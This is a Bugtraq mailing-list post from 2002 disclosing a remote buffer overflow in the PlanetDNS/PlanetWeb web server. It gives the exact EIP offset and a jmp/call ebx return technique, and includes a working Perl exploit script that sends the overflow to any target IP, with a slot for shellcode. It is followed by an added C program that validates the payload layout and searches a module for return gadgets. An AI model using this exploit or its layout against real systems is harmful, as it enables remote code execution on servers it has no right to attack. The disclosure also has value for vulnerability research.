[27494] in bugtraq
New buffer overflow in PlanetDNS
daemon@ATHENA.MIT.EDU (securma massine)
Fri Oct 18 13:04:12 2002
From: securma massine <securma@caramail.com>
To: bugtraq@securityfocus.com
Message-ID: <1034935247027123@caramail.com>
Date: Fri, 18 Oct 2002 12:00:47 GMT+1
Hi,

PlanetDNS (http://www.planetdns.net) is a commercial software package that lets you turn a computer into an Internet server: you create an Internet name and can then reach a web server, FTP server, mail server, etc. running on that computer.

PlanetDNS is vulnerable to a buffer overflow with an overwrite of EIP (never posted before). Someone already reported that a 1024-byte request could crash the server, and I found that sending a 6500-byte buffer (without "GET /") overwrites EIP and so allows execution of a shellcode; the overwrite happens at bytes 6449, 6450, 6451 and 6452.

One also notices that ebx always points 4 bytes before EIP, so the return address will be a jmp ebx or call ebx, which can be found in many loaded modules.

I wrote an exploit, tested on PlanetWeb v1.14, which gives the following register state:
Access violation - code c0000005 (first chance)
eax=0217dfb0 ebx=0217ffdc ecx=43434343 edx=7846f5b5
esi=0217dfd8 edi=00000000
eip=43434343 esp=0217df18 ebp=0217df38 iopl=0 nv up
ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b
gs=0000 efl=00000246
43434343 ?? ???

Exploit code:
#!/usr/bin/perl -w
# tool bop.pl
# buffer overflow tested against PlanetWeb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (especially christal... the less hard you
# pedal, the less fast you go..)
#
use strict;
use IO::Socket;

if ($#ARGV < 0) {
    print "\n write the target IP!! \n\n";
    exit;
}

# add your favourite shellcode here (this string is only a placeholder)
my $shellcode = "YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
# padding up to the 4 bytes that ebx points at (EIP is overwritten at bytes 6449-6452)
my $buffer    = "A" x 6444;
# you have the chance that ebx = eip - 4 bytes: execution starts here with a nop,
# then "jmp short +8" (EB 08) hops over the return address and the nop pad
my $ebx       = "\x90\xEB\x08\x90";
# insert your ret address: a jmp ebx (FF E3) or call ebx (FF D3) in a loaded module
my $ret       = "\x43\x43\x43\x43";
# nop pad; the EB 08 jump lands on its last byte, right before the shellcode
my $minibuf   = "\x90\x90\x90\x90";

my $connect = IO::Socket::INET->new(Proto    => "tcp",
                                    PeerAddr => $ARGV[0],
                                    PeerPort => "80")
    or die "cant connect $ARGV[0]";

print "\nsending exploit......\n\n";
print $connect "$buffer$ebx$ret$minibuf$shellcode";
close($connect);
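The payload layout above (6444 bytes of padding, the 4-byte stub that ebx points at, the saved return address, a NOP pad, then shellcode) only works if two arithmetic details are right: the EIP slot really sits at bytes 6449-6452 and the `EB 08` short jump lands in the NOP pad rather than on the return address. The C program below is an added example, not part of the original post or of any PlanetDNS code: it rebuilds the payload with the post's offsets, resolves the short jump the way the CPU does (next instruction plus sign-extended rel8), checks those invariants, and scans a constructed fake module image for the `jmp ebx` (FF E3) / `call ebx` (FF D3) trampolines the post proposes as return address. The shellcode and the module bytes are constructed placeholders; only the offsets come from the post.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Layout taken from the post's exploit (0-based offsets): "A" x 6444, then the
 * 4 bytes ebx points at, then the saved return address (bytes 6449-6452 when
 * counted from 1), a 4-byte NOP pad, then the shellcode. */
#define PAD_LEN 6444
#define EBX_OFF (PAD_LEN)
#define RET_OFF (PAD_LEN + 4)
#define NOP_OFF (RET_OFF + 4)
#define SC_OFF  (NOP_OFF + 4)

/* Build the payload exactly as bop.pl concatenates it. ret is written
 * little-endian (x86). Returns a malloc'd buffer, length stored in *out_len. */
static uint8_t *build_payload(uint32_t ret, const uint8_t *sc, size_t sc_len, size_t *out_len)
{
    static const uint8_t ebx_stub[4] = {0x90, 0xEB, 0x08, 0x90}; /* nop; jmp short +8; nop */
    size_t len = SC_OFF + sc_len;
    uint8_t *p = malloc(len);
    if (p == NULL)
        return NULL;
    memset(p, 'A', PAD_LEN);
    memcpy(p + EBX_OFF, ebx_stub, 4);
    for (int i = 0; i < 4; i++)
        p[RET_OFF + i] = (uint8_t)(ret >> (8 * i));
    memset(p + NOP_OFF, 0x90, 4);
    memcpy(p + SC_OFF, sc, sc_len);
    *out_len = len;
    return p;
}

/* Resolve an x86 "EB rel8" short jump at jmp_off: target = address of the next
 * instruction + sign-extended 8-bit displacement. Returns -1 if there is no EB
 * opcode there or the target falls outside the buffer. */
static long short_jmp_target(const uint8_t *p, size_t len, size_t jmp_off)
{
    if (jmp_off + 2 > len || p[jmp_off] != 0xEB)
        return -1;
    long target = (long)(jmp_off + 2) + (int8_t)p[jmp_off + 1];
    if (target < 0 || (size_t)target >= len)
        return -1;
    return target;
}

/* Invariants that make the post's trick work: EIP slot where the post says it is,
 * the stub sitting at ebx = eip - 4, and the short jump landing inside the NOP pad
 * (never on the return address) with only NOPs between it and the shellcode. */
static int layout_ok(const uint8_t *p, size_t len)
{
    if (RET_OFF != 6449 - 1 || EBX_OFF != RET_OFF - 4)
        return 0;
    long t = short_jmp_target(p, len, EBX_OFF + 1);
    if (t < (long)NOP_OFF || t >= (long)SC_OFF)
        return 0;
    for (long i = t; i < (long)SC_OFF; i++)
        if (p[i] != 0x90)
            return 0;
    return 1;
}

/* Scan a module image for the trampolines the post suggests as return address:
 * jmp ebx = FF E3, call ebx = FF D3. Returns the hit count; *first gets the
 * offset of the first hit, or -1 if none. */
static int find_ebx_gadgets(const uint8_t *img, size_t len, long *first)
{
    int hits = 0;
    *first = -1;
    for (size_t i = 0; i + 1 < len; i++) {
        if (img[i] == 0xFF && (img[i + 1] == 0xE3 || img[i + 1] == 0xD3)) {
            if (*first < 0)
                *first = (long)i;
            hits++;
        }
    }
    return hits;
}

int main(void)
{
    /* Constructed placeholder shellcode (int3 x 8), not a real payload. */
    const uint8_t sc[8] = {0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC};
    size_t len;
    uint8_t *p = build_payload(0x43434343u, sc, sizeof sc, &len);
    if (p == NULL)
        return 1;
    printf("payload %zu bytes, ret slot at offset %d, jmp lands at %ld, layout %s\n",
           len, RET_OFF, short_jmp_target(p, len, EBX_OFF + 1),
           layout_ok(p, len) ? "ok" : "BROKEN");

    /* Constructed fake module bytes: one call ebx and one jmp ebx among filler. */
    const uint8_t img[] = {0x55, 0x8B, 0xEC, 0xFF, 0xD3, 0x90, 0xC3, 0xFF, 0xE3, 0xC3};
    long first;
    int n = find_ebx_gadgets(img, sizeof img, &first);
    printf("%d ebx trampolines in fake module, first at offset %ld\n", n, first);
    free(p);
    return 0;
}
```

With the post's numbers the jump at offset 6445 resolves to 6455, the last NOP before the shellcode at 6456; change the displacement to `EB 04` and `layout_ok` reports the jump landing on the return address bytes, which is the kind of off-by-a-few mistake that turns a working overflow into a crash at `43434343`.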